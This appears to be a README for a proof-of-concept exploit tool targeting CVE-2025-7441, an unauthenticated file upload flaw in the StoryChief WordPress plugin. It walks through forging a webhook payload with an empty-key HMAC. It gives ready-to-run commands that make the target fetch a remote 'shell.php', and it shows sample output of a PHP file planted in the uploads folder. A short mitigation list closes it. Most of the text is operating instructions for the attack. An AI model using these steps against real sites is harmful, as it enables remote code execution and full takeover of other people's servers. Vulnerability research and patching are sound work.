<p align="center">
  <img src="img.png" alt="CVE-2025-7441"/>
</p>

# CVE-2025-7441 StoryChief 1.0.42 - Arbitrary File Upload 

## Vulnerability (CVE-2025-7441) - Technical summary
- **Affected component:** StoryChief WordPress plugin
- **Vulnerability type:** Unauthenticated arbitrary file upload
- **Vulnerable endpoint:** `/wp-json/storychief/webhook`  
- **Root cause:** The plugin accepts a JSON webhook payload that contains a URL (under `data.featured_image.data.sizes.full`) and performs a server-side HTTP GET on that URL without sufficient validation (no domain allowlist, insufficient MIME/content checks, and files are saved under public upload paths).  
- **Impact:** An unauthenticated attacker can cause the server to fetch and persist attacker-controlled content into the WordPress uploads directory (e.g. `wp-content/uploads/YYYY/MM/<filename>`). If the uploaded file can be interpreted/executed by the server (for example, a PHP file and the server allows PHP execution there), this leads to remote code execution (RCE) and full site compromise.  
- **CVSS (example):** 9.8 (Critical) — severity depends on the hosting configuration and execution allowances.

---

## About this PoC  (`CVE-2025-7441`)
This script automates the typical exploitation verification flow for the vulnerability:

1. Build a webhook JSON payload that places a remote file URL into `data.featured_image.data.sizes.full`.  
2. Compute an HMAC-SHA256 signature over the payload (script computes using an empty key by default) and store it in `meta.mac`.  
3. POST the payload to `<site_url>/wp-json/storychief/webhook`.  
4. Verify whether the fetched file is present at the expected uploads path:

<site_url>/wp-content/uploads/<YEAR>/<MM>/<basename>

If the file responds with HTTP 200, the script reports success; otherwise it prints `<failed to upload>`.

The script includes the following flags: `--file-url`, `--verbose`, `--use-curl`, and `--retries`.


## Usage

python3 CVE-2025-7441.py <site_url>

### Positional argument
- `<site_url>` — Base URL of the target site. Example: `http://127.0.0.1:5000/` or `https://target.example/`

### Flags
- `--file-url` — Override the default remote file URL the PoC uses. Default: hard-coded sample raw GitHub URL. Example: `--file-url https://127.0.0.1:5000/zip.php`
- `--verbose` — Enable verbose output (prints request/response details and check progress).
- `--use-curl` — Use `curl` subprocess to deliver the POST (fallback mode). Requires `curl` installed.
- `--retries` — Number of attempts to check the expected upload path for the file. Default: `1`. Use e.g. `--retries 5` to poll multiple times.

---

## Example command


```
python3 CVE-2025-7441.py http://127.0.0.1:5000/
```

Specify a custom remote file URL

```
python3 CVE-2025-7441.py http://127.0.0.1:5000/  --file-url https://example.com/shell.php
```

Verbose output and multiple checks

```
python3 CVE-2025-7441.py http://127.0.0.1:5000/ --file-url https://example.com/shell.php --verbose --retries 5
```

Use curl to deliver the POST

```
python3 CVE-2025-7441.py http://127.0.0.1:5000 --file-url https://example.com/shell.php --use-curl --verbose
```

output:

```
[*] Target: https://127.0.0.1:5000
[*] file_url: https://127.0.0.1:5000/ZIP.php
[*] retries: 3
[*] use_curl: False
[+] computed hmac : 3f2a9b0e4d6c5a1f0b9d6e3c2a1f4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1
[*] Sending POST via requests...
[*] POST status: 200
[*] Response body (truncated):
{"permalink":"/wp-content/uploads/2025/10/ZIP.php","id":12345}
[*] Checking (1/3): https://127.0.0.1:5000/wp-content/uploads/2025/10/ZIP.php
[+] success! [+]
https://127.0.0.1:5000/wp-content/uploads/2025/10/ZIP.php
```

### Mitigation

Mitigation & Remediation
Short term:


Upgrade StoryChief to a patched version immediately when available.
Block or restrict /wp-json/storychief/webhook via WAF or server rules.
Restrict server outbound fetches or egress to untrusted domains.

Developer guidance:


Validate file types and contents after any remote fetch; verify images using safe parsers and reject invalid files.
Require authentication for webhooks that cause server-side downloads or file creation.
Ensure HMAC/signature verification is implemented and enforced.
Store uploaded content outside the webroot or disable execution of uploaded files in wp-content/uploads  
